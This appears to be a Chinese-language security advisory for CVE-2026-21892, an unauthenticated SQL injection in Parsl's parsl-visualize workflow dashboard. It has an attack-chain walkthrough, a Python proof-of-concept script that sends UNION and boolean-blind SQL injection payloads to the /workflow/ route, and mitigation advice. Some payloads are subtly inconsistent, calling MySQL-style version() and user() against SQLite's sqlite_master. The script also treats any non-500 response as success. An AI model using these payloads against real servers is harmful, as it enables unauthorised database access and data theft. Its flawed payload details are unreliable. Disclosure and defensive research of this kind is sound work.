CVE-2026-21892 Parsl parsl-visualize SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-21892

漏洞类型

SQL注入

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Parsl (parsl-visualize组件)

漏洞概述

CVE-2026-21892是Python并行脚本库Parsl中parsl-visualize组件存在的一个SQL注入漏洞。该漏洞存在于工作流可视化仪表板中，攻击者可以通过URL路由中的workflow_id参数注入任意SQL命令。漏洞根源在于应用程序使用Python %操作符进行字符串格式化时，直接将用户提供的workflow_id拼接到SQL查询语句中，而没有进行任何输入验证或参数化查询。这使得未经身份验证的攻击者（只要能访问可视化仪表板）可以执行任意SQL语句，可能导致敏感数据泄露、数据库篡改或服务拒绝。Parsl是一个用于构建和执行并行工作流的Python库，广泛应用于高性能计算和科学计算领域。parsl-visualize组件提供工作流执行的可视化功能，用户通过Web界面查看工作流状态和结果。由于该漏洞影响所有2026年1月5日之前发布的版本，且无需认证即可利用，攻击门槛较低。建议用户立即升级到修复版本2026.01.05或采取临时缓解措施。

技术细节

该SQL注入漏洞位于Parsl库的parsl-visualize组件中。具体来说，应用程序在处理URL路由时，直接从请求中获取workflow_id参数，并使用Python的%操作符将其插入到SQL查询字符串中。这种不安全的字符串格式化方式允许攻击者通过构造特殊的workflow_id值来修改SQL查询的逻辑结构。例如，攻击者可以使用SQL注释符、UNION SELECT语句或布尔盲注等技术来提取数据库中的敏感信息或执行恶意操作。由于查询构建过程中没有使用参数化查询或输入过滤机制，用户输入被直接解释为SQL代码的一部分。攻击者可以利用此漏洞获取数据库中的工作流配置、用户信息、执行日志等敏感数据，甚至可能在某些配置下执行系统命令。该漏洞的利用条件较为宽松：攻击者只需能够访问parsl-visualize服务，无需任何认证凭证即可发起攻击。修复方案已在版本2026.01.05中实施，主要变更是将不安全的字符串格式化替换为参数化查询，并对用户输入进行严格的输入验证。

攻击链分析

STEP 1

步骤1

攻击者发现目标服务器运行Parsl parsl-visualize服务（通常监听在5000端口）

STEP 2

步骤2

攻击者访问可视化仪表板的URL路由，如/workflow/<workflow_id>

STEP 3

步骤3

攻击者构造恶意SQL payload作为workflow_id参数，如' UNION SELECT NULL,version(),NULL--

STEP 4

步骤4

服务器使用Python %操作符将payload直接拼接到SQL查询中，未进行任何过滤或参数化

STEP 5

步骤5

恶意SQL语句被执行，攻击者成功注入任意SQL命令

STEP 6

步骤6

攻击者利用UNION注入、布尔盲注等技术提取数据库中的敏感信息（如用户凭证、工作流数据等）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib3
urllib3.disable_warnings()

# CVE-2026-21892 SQL Injection PoC for Parsl parsl-visualize
# Target: Parsl parsl-visualize component < 2026.01.05

target = "http://target-server:5000"

# Basic SQL injection test - extract database version
payloads = [
    "' OR '1'='1",
    "' UNION SELECT NULL,version(),NULL-- ",
    "' UNION SELECT NULL,user(),NULL FROM sqlite_master-- ",
    "1' AND 1=1-- ",
    "1' AND 1=2-- "
]

def test_sql_injection(target_url, workflow_id):
    """Test SQL injection with given workflow_id"""
    url = f"{target_url}/workflow/{workflow_id}"
    try:
        response = requests.get(url, timeout=10)
        return {
            "payload": workflow_id,
            "status_code": response.status_code,
            "response_length": len(response.text),
            "success": response.status_code != 500
        }
    except requests.exceptions.RequestException as e:
        return {"payload": workflow_id, "error": str(e)}

# Run PoC
print("Testing CVE-2026-21892 SQL Injection...")
for payload in payloads:
    result = test_sql_injection(target, payload)
    print(f"Payload: {payload}")
    print(f"Result: {result}\n")

影响范围

Parsl < 2026.01.05 (parsl-visualize组件)

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web应用防火墙（WAF）上配置规则，拦截包含SQL注入特征字符（如单引号、UNION、SELECT等）的请求；2) 通过网络层限制对parsl-visualize服务的访问，仅允许受信任的IP地址访问；3) 禁用可视化仪表板的数据库查询功能；4) 监控和记录所有对/workflow/*路由的请求，及时发现异常行为。建议尽快完成版本升级以从根本上修复该漏洞。